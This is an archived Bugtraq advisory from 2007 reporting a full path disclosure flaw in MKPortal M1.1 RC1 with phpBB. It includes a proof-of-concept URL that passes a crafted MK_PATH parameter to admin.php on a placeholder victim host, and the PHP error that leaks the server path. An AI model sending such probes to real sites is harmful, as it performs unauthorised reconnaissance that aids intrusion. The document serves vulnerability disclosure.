lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070108010151.20612.qmail@securityfocus.com> Date: 8 Jan 2007 01:01:51 -0000 From: info@...nhead.it To: bugtraq@...urityfocus.com Subject: MKPortal Full Path Disclosure MkPortal Full Path Disclosure Vulnerability discovered by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it Tested on MKPortal M1.1 RC1 with PhpBB other versions may also be affected. http://www.victim.com/mkportal/admin.php?MK_PATH=1 Warning: main(mkportal/include/mk_mySQL.php): failed to open stream: No such file or directory in D:\inetpub\webs\victimcom\mkportal\include\PHPBB\php_driverf.php on line 24